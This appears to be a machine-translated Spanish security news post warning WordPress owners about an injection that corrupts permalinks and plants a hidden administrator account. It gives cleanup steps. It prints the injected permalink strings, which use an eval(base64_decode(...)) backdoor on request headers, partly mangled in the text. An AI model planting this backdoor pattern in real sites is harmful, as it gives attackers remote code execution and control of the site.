Inyección de WordPress SQL - Último ataque

Inyección de WordPress SQL - Último ataque / Noticias

La mayoría de los sitios se están viendo afectados por un ataque SQL reciente en el que se están inyectando códigos a su sitio. Esta inyección de MySQL afecta sus enlaces permanentes al hacerlos ineficaces. Como resultado, las entradas de tu blog no funcionarán. Numerosos blogs de WordPress fueron atacados en este ataque. Gracias a Andy Soward por llamar esto a nuestra atención..

Hubo uno de los siguientes códigos que se agregaron a su estructura de enlace permanente debido a este ataque:

% & ($ eval (base64_decode ($ _ SERVER [HTTP_REFERER])) |. +) &%

“/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%% D% 7D|.+)&%

Estas citas adjuntan todos los enlaces permanentes en su sitio y solo se pueden cambiar si se eliminan manualmente.

Para solucionar este problema vaya a:

Configuraciones> Permalinks y elimina el código anterior y reemplaza tu código predeterminado.

Lo siguiente que debes hacer es ir a Usuarios. Verás que hay más de un administrador. No verá su nombre en la lista, pero verá que el conteo aumentó. Entonces, lo que debe hacer es mirar a todos los usuarios y encontrar al último que se registró. Ponga su mouse sobre ese usuario y obtenga el enlace. Cambie el código userid = agregando 1 a ese número. Entonces, si el último usuario que puedes ver es el usuario # 2, entonces agrega 1 y hazlo 3. Debes encontrar que el administrador oculto tiene un código extraño como nombre. Borra el código y hazlo un suscriptor. Luego vuelve y elimínalo..

Esto debería solucionar el problema. También puede eliminarlo simplemente yendo a su PHPMyAdmin. Porque verás al usuario allí..

Solo queríamos publicar esta noticia lo antes posible para que nuestros usuarios puedan actualizarse. Por favor, asegúrese de verificar que su blog no esté infectado. Esperamos que WordPress salga pronto con un lanzamiento..

Además, si no ha implementado algunas de estas medidas para asegurar su área de administración de WordPress.